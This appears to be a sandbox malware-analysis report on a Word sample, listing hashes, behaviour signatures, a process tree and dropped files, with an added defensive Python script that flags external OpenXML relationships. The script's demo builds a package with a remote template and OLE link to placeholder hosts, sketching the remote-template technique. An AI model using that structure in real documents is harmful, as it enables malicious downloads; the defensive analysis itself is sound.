Analysis

  • max time kernel
    145s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    27-06-2024 13:48

General

  • Target

    1639529b874fd4542fe764723a409756_JaffaCakes118.doc

  • Size

    242KB

  • MD5

    1639529b874fd4542fe764723a409756

  • SHA1

    e9b5c172ebe286d1c9f86f728491b789dd0198da

  • SHA256

    3598a4e8f79938a5e94f6c7274d60d0f4670dc73856243ffd915c56094db2126

  • SHA512

    ac574977a296574501e09ad4ce1821e698667b2fa3f088de5313f6edd74d966cfef5f4e9ec60698c0d6d5b18d745be5a893490eba3bfc0cb3df69fc9a0e6c4b9

  • SSDEEP

    1536:9terTkw9HnXPJguq73/IKB5Kby0gchHrTPryiK/dRYpmXWDapCi9iy:9vw9HXPJguq73/IKBWy6ydS0GDk5N

Score
7/10

Malware Config

Signatures

  • Abuses OpenXML format to download file from external location 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\1639529b874fd4542fe764723a409756_JaffaCakes118.doc"
    1⤵
    • Abuses OpenXML format to download file from external location
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2820
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2580
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      1⤵
      • Abuses OpenXML format to download file from external location
      • Enumerates system info in registry
      • Suspicious use of SetWindowsHookEx
      PID:1812

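Both the WINWORD.EXE instance and the COM-activated EXCEL.EXE instance above carry the signature "Abuses OpenXML format to download file from external location". That signature fires when an OpenXML package (here either the document itself, despite its .doc extension, or the embedded workbook that Word hands to EXCEL.EXE) contains a relationship whose TargetMode is External, so Office will resolve the target over the network at open time. The report does not print the target, so the check is reproduced below as an added example (this script is not part of the report or of any sandbox's own code). It walks every .rels part of a package, lists external-mode relationships, and lists parts under embeddings/, which is what an embedded OLE object looks like on disk. Note also that EXCEL.EXE is launched with /automation -Embedding and sits at tree depth 1 beside WINWORD.EXE rather than under it: COM activation starts it, so a parent-child rule keyed on WINWORD.EXE would not see it. The sample package built by build_sample() and its example.invalid URLs are constructed for the demonstration and are not indicators from this report.

```python
"""Offline check behind the "Abuses OpenXML format to download file from
external location" signature.  Added example for this report, not the
sandbox's own code.  The package built by build_sample() is constructed
for the demonstration and is NOT the analysed sample."""
import io
import sys
import zipfile
import xml.etree.ElementTree as ET

PKG_REL = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"


def scan_external_relationships(package: bytes):
    """Return (rels_part, relationship_type, target) for every relationship in
    any *.rels part whose TargetMode is External.  Office resolves such
    targets when the document is opened, which is how a remote template or a
    linked OLE object is fetched from the network."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(package)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(PKG_REL + "Relationship"):
                if rel.get("TargetMode", "Internal").lower() != "external":
                    continue
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                findings.append((name, rel_type, rel.get("Target", "")))
    return findings


def list_embedded_objects(package: bytes):
    """Parts under an embeddings/ folder are embedded OLE payloads, e.g. a
    workbook that Word hands to EXCEL.EXE /automation -Embedding."""
    with zipfile.ZipFile(io.BytesIO(package)) as z:
        return sorted(n for n in z.namelist() if "/embeddings/" in n)


def build_sample() -> bytes:
    """Constructed minimal Word package: one external oleObject link, one
    external attached template, one embedded workbook.  The example.invalid
    URLs are placeholders, not indicators from the report."""
    def rels(*items):
        body = "".join(
            f'<Relationship Id="rId{i}" Type="{OFFICE_REL}{t}" Target="{tgt}"'
            + (' TargetMode="External"' if ext else "") + "/>"
            for i, (t, tgt, ext) in enumerate(items, 1)
        )
        return ('<?xml version="1.0" encoding="UTF-8"?>'
                f'<Relationships xmlns="{PKG_REL[1:-1]}">{body}</Relationships>')

    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("_rels/.rels", rels(("officeDocument", "word/document.xml", False)))
        z.writestr("word/document.xml", "<w:document/>")
        # document.xml.rels: an internal settings part, an EXTERNAL OLE link and
        # an internal relationship to the embedded workbook
        z.writestr("word/_rels/document.xml.rels", rels(
            ("settings", "settings.xml", False),
            ("oleObject", "http://example.invalid/payload.xlsx", True),
            ("package", "embeddings/Microsoft_Excel_Worksheet1.xlsx", False),
        ))
        z.writestr("word/settings.xml", "<w:settings/>")
        # settings.xml.rels is where a remote (attached) template lives
        z.writestr("word/_rels/settings.xml.rels", rels(
            ("attachedTemplate", "http://example.invalid/template.dotm", True),
        ))
        z.writestr("word/embeddings/Microsoft_Excel_Worksheet1.xlsx", b"PK\x03\x04")
    return buf.getvalue()


if __name__ == "__main__":
    # Usage: python scan_ooxml.py <file>   (no argument: scan the constructed sample)
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    for part, rel_type, target in scan_external_relationships(data):
        print(f"EXTERNAL {rel_type:<18} {target}  (in {part})")
    for part in list_embedded_objects(data):
        print(f"EMBEDDED {part}")
```

Run it against the sample to see which relationship type and target the signature is reacting to; an external attachedTemplate or oleObject is the finding to chase, while external hyperlinks are usually noise. If the outer file is a legacy OLE .doc rather than a zip, extract the embedded OOXML workbook first and run the scan on that part.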
Network

MITRE ATT&CK Enterprise v15

Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{F92216A0-9F59-4D86-B886-9EBA6D76F436}.FSD

      Filesize

      128KB

      MD5

      4bc3d3841c5d1e2d12a5e0ee490d713e

      SHA1

      fa5c7eacef3c88ef8d3e87cbce52d5cabefdfc68

      SHA256

      453e10c95ce936c5ee1821c7403daedd75ac4c1f1dd6883027c91f02c0e0e03b

      SHA512

      36f49d5a0319207b64c7c7b6a809de5176e954459fb33034ef82e265c2c5e303d98326d6e5231ca6da6911054f557945b0205bd5b74d6a6385f4baafcdb214e5

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

      Filesize

      128KB

      MD5

      6c91105c6f60d093670c6c934c1f6858

      SHA1

      ed7be9e6267ffe8b06172a18abf5478a1300642e

      SHA256

      d57d58a8cbac11cb976e7c2bc6a235d53d9ee1373130ee0a9969a71725a9b980

      SHA512

      e722864624bae01892a498799ea4a9ea077b4107cf284b9067702dc0bb67f0325b6fcbcd8d0f2d42b6ca1dc0c1635795ad0a1a2ac97ea6e300aa872a699531dc

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{0CA23DBE-6815-42E1-90BB-EF4BC8EFE50C}.FSD

      Filesize

      128KB

      MD5

      77e9c47ada574d7c34a4ab6f7c4b192e

      SHA1

      a6edf091bc8923de2f5c4bab4be0eda4f9d0a8d3

      SHA256

      faca9cc965bf2951116bcd5e993941386d558136beab43946da69d011fcdf363

      SHA512

      0e4fc789f99a0d63c85033d02888199fb98608685c083effc3d2f66c90697394906e931626265c712647bab22612d783e00168b05af0d5b121c03268b4907fb1

    • C:\Users\Admin\AppData\Local\Temp\{4C046931-6DCF-41B6-8010-EBE6B20F22E4}

      Filesize

      128KB

      MD5

      561a66a2143f7992dae6f7b3813645f0

      SHA1

      259d557f7bdcd36a0fb9ce4070a32c210c03acad

      SHA256

      277dcf2c1d70ec5f490578ee0f8dc917cc53e14076c95253a369e483e9a3afe4

      SHA512

      9992fdad89138fdd9350157d16652ec953233894feeddfb9c0e06e19da74a1df432ce93b8b7fba647e3ddecef55e639e3e8b2d05bea0c106671df05f32696a88

    • memory/2820-0-0x000000002F891000-0x000000002F892000-memory.dmp

      Filesize

      4KB

    • memory/2820-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2820-2-0x000000007179D000-0x00000000717A8000-memory.dmp

      Filesize

      44KB

    • memory/2820-11-0x000000007179D000-0x00000000717A8000-memory.dmp

      Filesize

      44KB

    • memory/2820-61-0x0000000004430000-0x0000000004530000-memory.dmp

      Filesize

      1024KB

    • memory/2820-62-0x000000000F9B0000-0x000000000FAB0000-memory.dmp

      Filesize

      1024KB

    • memory/2820-517-0x0000000004430000-0x0000000004530000-memory.dmp

      Filesize

      1024KB

    • memory/2820-518-0x000000000F9B0000-0x000000000FAB0000-memory.dmp

      Filesize

      1024KB